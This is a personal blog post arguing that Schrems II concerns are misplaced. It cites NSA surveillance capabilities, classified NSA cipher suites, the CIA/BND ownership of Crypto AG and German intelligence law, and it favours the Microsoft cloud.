Wednesday, November 25, 2020

Schrems-II OR the myth of data security outside of US companies like MS

UPDATED 18.12.2020 (Added 7. Dagger Complex)

Today its time to sort out some important things on cybersecurity & the Schrems II myth on "data is secure when it is not anymore in reach of NSA or US based companies forced by NSL (National Security Letters)" which would include Microsoft with its Cloud offerings (as its headquarter is based in Seattle Washington (State)) as well as Google, Facebook or Amazon.

The very short story: When it comes to cyber security and cyber protection there are multiple players. From some you can protect yourself (even with MS security tools and the Microsoft Security Graph and its relying toolset which is still unbeaten in this area). These include typical hackers. 

And others you simply can't protect yourself as they operate on a complete different level which includes NSA and probably also MOSSAD / SHIN BET (during my time in Israel I learned some former Israel militaries (e.g. Unit 8200) they are now working in cyber security. Did you ever thought why most of the cyber security startups coming from Israel? Its caused by their military as they are forced to be specialists on this while surrounded by their enemies). If you are more interested in this - here is a great article from Jerusalem Post

Now lets come to the really long story (Hopefully you have time. Its worth I think but grab a coffee! After the legal part it becomes better than James Bond!)

But first lets us sort out some things and be open.

1. Lets come first to Mr. Max Schrems. He is an austrian lawyer, author and data protection activist. I do not want to judge on his motives and if he is a US or MS hater or not who knows.

2. Now lets come the the current Schrems II court rule. Originally as answer of the Schrems I court rule the EU Privacy Shield was created. This was falling last summer.

"The CJEU ruled that the Privacy Shield does not provide adequate protection, and invalidated the agreement. The court also ruled that European data protection authorities must stop transfers of personal data made under the standard contractual clauses by companies, like Facebook, subject to overbroad surveillance. This decision has significant implications for U.S. Companies and for the U.S. Congress because it calls into question the adequacy of privacy protection in the United States." ( Press Release)

Microsoft created a smart solution for this until (slower) law rulers in the EU and the US will sort out these things in another legal way.

a. the Microsoft cloud is acting under EU standard clauses which are independent of the EU Privacy Shield.

b. the very long story on this and how it relates to Microsoft365 in this blog post (from data protection lawyer Koellner (sorry its in German especially as this relates very much to Germans as we are taking everything very serious. What is a joke? I don't know Jokes. I am a German :-D)

c. Latest MS answer on this by Julie Brill (Corp VP for Privacy and Chief Privacy Officer at MS 11/19/2020) including financial commitment. I think this is up to now still a good reason to stick with the Microsoft Cloud.

Ok for now I think we can stop this legal discussion and come to the real beef!

3. Lets talk first about the NSAs global surveilance capabilities. The capabilities they had some years ago were revealed by the Snowden leak. And this is what is known (un-)officially. As this leak has passed 7 years for now; don't think they did not improved their systems.

We always talk about legal access to data in a central datacenter and we need to protect this. You are absolutely wrong! From a legal (only) perspective you are wright but not in the NSA case. 

If they had not (yet) direct access on the data in an US companies datacenter somewhere on earth. The data will be transmitted from or to your computer. And this is the real crown jewel. Then they have everything. Your data, access to your mic and your camera and everything that's going on on your screen. 

The toolset they have is utilizing lots of still unknown Zero day exploits in an very automated manner. They point to an IP and finally that's it. Game over (for you). 

And don't think "my virus scanner" is saving me. Often they cant as 50% of attacks are ongoing "in memory only" so the AV scanner does not see anything. 

Microsoft developed Advanced Threat Protection (Microsoft ATP; now called Microsoft Defender for Endpoints) to cover also this sort of attacks. 

Another serious and very hard to handle attack vector are firmware attacks. As this is done on a hardware layer no software can see or control it. Just imagine a hacked network adapters firmware. Everything is done and manipulated on the last piece before the bytes hit the wire!

4. Now lets talk about encryption. We believe (oh yeah) we use the latest and greatest encryption. (And I don't talk right now about quantum computing which is another huge threat just around the corner. I will cover this in another blog post). 

When you do some research on this you will come across NSA encryption suite B (WARNING NIST official website!) (now replaced by Commercial National Security Algorithm Suite CNSA) (WARNING NSA official website!)

Hmm lets think a moment! When there is a Suite B (officially known encryption algorithms) isn't there also a Suite A and when does NSA advice to use which one?

First of all. There is also a Suite A. While Suite B is using lots of algorithms you already know very well like AES (Advanced Encryption Standard) there are also others you may never heard of in Suite A. So fancy names like ACCORDION, BATON, FIREFLY, JOSEKI, KEESEE, MAYFLY, MEDLEY, SAVILLE, SHILLELAGH, WALBURN or WEASEL.

Ok when to use which one (according to official CNSSI 4009 National Information Assurance term definitions)

"Suite A:
A specific set of classified cryptographic algorithms used for the protection of some categories of restricted mission critical information.

Suite B:
A specific set of cryptographic algorithms suitable for protecting both classified and unclassified national security systems and information throughout the US government and to support interoperability with allies and coalition partners."

Translated: When Suite B is not safe enough US government will use Suite A for the real sensitive stuff.

Wait a moment there is something which come into my (history) mind. When did the US government released officially SSL encryption in browsers with 128 bit encryption end of 1990's ? They started to release when they were able to break it!

Translated: We give others only encryption stuff when we are able to break it by ourselves.

5. And now lets come to the greatest coup CIA did ever (still cant stop laughing on it how bold they were). Its the case of Crypto AG also known as "Operation Rubikon". And that's actually why you are not even safe in Germany with German vendors!

But for a better understanding a short lesson on sigint (signal intelligence) history. The so-called 5-Eyes (US, UK, Canada, Australia, New Zealand) operating the global surveillance network. 

The German BND (Bundesnachrichtendienst / the German version of CIA) had it's roots from Organization Gehlen  the successor of the German military intelligence in 2nd world war. After the war lots of these guys were recruited again for Gehlen Org which become later the BND and had already in its early years very strong connection to the CIA. Also caused due to the cold war. So lets say BND is a very good buddy of CIA and NSA. Just read the book "Bedingt dienstbereit: Im Herzen des BND" (from the former BND agents Norbert Juretzko and Wilhelm Dietl, sorry its in german only)

And believe it or not many countries and militaries in the good old time thought hey its a bad idea to buy encryption stuff from US companies. They might have embedded backdoors. Lets go better to guys they have a strong "security" reputation in any way. And that's Switzerland. They are absolutely neutral to anybody (What they state. If they are really I don't know).

Lets look for a swiss company to get really trustworthy and reliable encryption devices for real safe communications to prevent any espionage on our communication and data.

CIA also realized this behavior. And they feared to loose control. Hmm what to do? This was the birth of "Operation Rubikon" and it lasts for 5 decades until 2018!

Here the story (directly form Wikipedia. I couldnt write it better):
"Crypto AG was a Swiss company specialising in communications and information security. It was secretly jointly owned by the American Central Intelligence Agency (CIA) and West German Federal Intelligence Service (BND) from 1970 until about 1993, with the CIA continuing as sole owner until about 2018. With headquarters in Steinhausen, the company was a long-established manufacturer of encryption machines and a wide variety of cipher devices. 

The company had about 230 employees, had offices in Abidjan, Abu Dhabi, Buenos Aires, Kuala Lumpur, Muscat, Selsdon and Steinhausen, and did business throughout the world. The owners of Crypto AG were unknown, supposedly even to the managers of the firm, and they held their ownership through bearer shares. 

The company has been criticised for selling backdoored products to benefit the American, British and German national signals intelligence agencies, the National Security Agency (NSA), the Government Communications Headquarters (GCHQ), and the BND, respectively. On 11 February 2020, The Washington Post, ZDF and SRF revealed that Crypto AG was secretly owned by the CIA in a highly classified partnership with West German intelligence, and the spy agencies could easily break the codes used to send encrypted messages. The operation was known first by the code name "Thesaurus" and later "Rubicon". According to a Swiss parliamentary investigation, "Swiss intelligence service were aware of and benefited from the Zug-based firm Crypto AG’s involvement in the US-led spying"."

6. And believe it our not it's getting even better. The new BND law is legalizing global data gathering (sorry its in German and also valid for other countries worldwide) the. Even into an amount of data the BND could probably not handle (initially "limited" to max 50% of all global communication). Just to give them a kind of limit. We do not want to have them off limits. :-D

7. Since the end of 2nd World War the US intelligence community had a couple SIGINT stations in Germany. For example checkout the story behind the Dagger Complex in Darmstadt (which soon is moved to Wiesbaden). Checkout the Wiki article.

Conclusion: Just thinking that you are a German company storing data in Germany with a German vendor does mean nothing! You are even not safe in your own premises. 

Unless you put your computer in an independent bunker with own electricity and no internet connection your are definitely not safe in this world!

So my recommendation: Don't do anything unlawful and you are not interesting for them.